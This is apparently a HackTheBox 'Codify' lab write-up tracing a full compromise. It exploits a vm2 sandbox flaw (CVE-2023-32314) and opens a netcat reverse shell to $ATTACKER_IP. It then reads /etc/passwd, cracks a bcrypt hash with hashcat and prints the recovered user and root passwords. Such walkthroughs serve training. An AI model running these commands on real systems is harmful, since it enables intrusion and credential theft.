# HackTheBox: Codify
## Notes by [Invictus808](https://invictus808.com)

## Scan

- [nmap](enumeration/external/nmap.txt)
    - ```console
        $ sudo nmap -T4 -p- -A $IP -oA codify
        ```
- [nikto](enumeration/external/nikto.txt)
    - ```console
        $ nikto -h $URL
        ```


## Codify Site

- Home Page
    - ![Codify home page](screenshots/codify.png "Codify Home Page")
- About Us Page
    - ![Codify about us page](screenshots/codify_about_us.png "Codify About Us Page")
    - [VM2 v3.9.16](https://github.com/patriksimek/vm2/releases/tag/3.9.16)
- Limitations Page
    - ![Codify limitations page](screenshots/codify_limitations.png "Codify Limitations Page")
- Editor Page
    - ![Codify editor page](screenshots/codify_editor.png "Codify Editor Page")


## VM2 &lt;v.3.9.18 - [CVE-2023-32314](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100)

- `VM2 <v.3.9.18` vulnerable to remote code execution
- proof of concept
    - [`vm2_exploit.js`](exploits/vm2_exploit.js)
    - ![VM2 remote code execution proof of concept](screenshots/codify_exploit_poc.png "VM2 Remote Code Execution Proof of Concept")
- reverse shell
    - set up netcat listener on attack machine
        - ```console
            $ nc -lnvp $ATTACKER_PORT -s $ATTACKER_IP
            ```
    - remote code execution command for reverse shell
        - ```
            rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $ATTACKER_IP $ATTACKER_PORT >/tmp/f
            ```
        - note: netcat was available to use on the target machine


## Shell !!!

- ![svc user shell](screenshots/svc.png "svc User Shell")


## File System Enumeration

- list valid machine users
    - ```console
        svc@codify:~$ grep -vE "nologin|false" /etc/passwd
        ```
        - ![Valid machine users](screenshots/machine_users.png "Valid Machine Users")
- list all files/directories owned by `svc` group
    - ```console
        svc@codify:~$ find / -group ruby 2>/dev/null
        ```
        - [`/var/www/contact/tickets.db`](enumeration/internal/tickets.db)
            - view SQLite database file using [online platform](https://inloop.github.io/sqlite-viewer/)
            - ```sh
                # username:password hash
                joshua:$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
                ```


## Crack Password Hash

- crack [user hash](hashcat/hashes.txt)
    - ```console
        $ hashcat -a 0 -m 3200 ./hashes.txt /usr/share/wordlists/rockyou.txt -o crackedhashes.txt -O --force --potfile-disable
        ```
    - module 3200 - `bcrypt $2*$, Blowfish (Unix)`
- recovered [user hash](hashcat/hashes.txt)
    - ```sh
        joshua:spongebob1
        ```


## Switch User

- SSH as `joshua` user
    - ```console
        $ ssh joshua@$IP
        joshua@codify.htb's password: spongbob1
        ```
        - ![joshua user shell](screenshots/joshua.png)
- retrieve [`user.txt`](flags/user.txt) flag
    - ```console
        joshua@codify:~$ cat /home/joshua/user.txt
        ```


## Privilege Escalation

- sudo privileges? `/opt/scripts/mysql-backup.sh`

- exploit bash `==` operator

- credentials `root:kljh12k3jhaskjh12kjh3`

- root !!!


## Acknowledgment of Completion

- [HackTheBox - Codify Completion](https://www.hackthebox.com/achievement/machine/1303009/574)
